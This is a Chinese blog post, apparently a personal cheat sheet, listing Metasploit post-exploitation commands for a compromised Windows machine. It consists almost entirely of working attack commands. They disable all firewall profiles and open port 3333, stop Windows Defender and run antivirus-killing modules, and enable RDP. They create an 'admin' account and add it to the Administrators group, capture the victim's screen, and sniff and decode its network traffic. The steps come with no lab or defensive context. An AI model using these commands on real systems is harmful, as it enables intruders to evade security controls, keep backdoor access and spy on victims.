首页 > 其他分享 >MSF内网信息收集(1)

MSF内网信息收集(1)

时间:2022-11-14 14:59:15浏览次数:58  
标签:run 收集 windows 防火墙 admin 关闭 MSF 内网

1. msf通过shell关闭防火墙

Netsh advfirewall set allprofiles state off(关闭防火墙)
Netsh advfirewall show allprofiles (查看防火墙状况)

通过策略添加防火墙规则规避行为(设置某个端口的行为不被防火墙所约束,相当于加入白名单)
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=3333 action=allow
netsh firewall add portopening TCP 3333 "VMWARE" ENABLE ALL
重启生效
  shutdown -r -f -t 0
  -f:强制重启
  -t :时间为0,立即重启

2、关闭杀毒软件

关闭windefend:
  net stop windefend
关闭杀毒软件(msf自带的两个模块)
  run killav
  run post/windows/manage/killav
  (其实没什么用,windows的杀软一般不能通过这种方式关闭)

3、打开并连接3389

通过MSF里面的自带模块可以打开3389的端口
  run  post/windows/manage/enable_rdp
  run getgui -e
可以利用MSF模块命令,在目标机器上添加用户:
  run  getgui -u admin -p admin
  -u:用户名
  -p:密码(注意windows服务器有密码强度的规范)
将添加的用户添加到用户组:
  net localgroup administrators admin /add
远程桌面连接
在windows中:mstsc——>打开远程桌面连接

在linux中:rdesktop——>redesktop -u username -p password ip
查看远程桌面:
  use espia
  screenshot
  screengrab
  screenshare

 删除指定账号:
  Run post/windows/manage/delete_user USERNAME=admin

 4. 数据包抓取

抓包:
    Load sniffer
    Sniffer_interface
    Sniffer_start 2
    Sniffer_dump 2 1.cap
解码
    Use auxillary/sniffer/psnuffle
    Set PCAPFILE 1.cap
    Exploit

标签:run,收集,windows,防火墙,admin,关闭,MSF,内网
From: https://www.cnblogs.com/TT-JZ/p/16889009.html

相关文章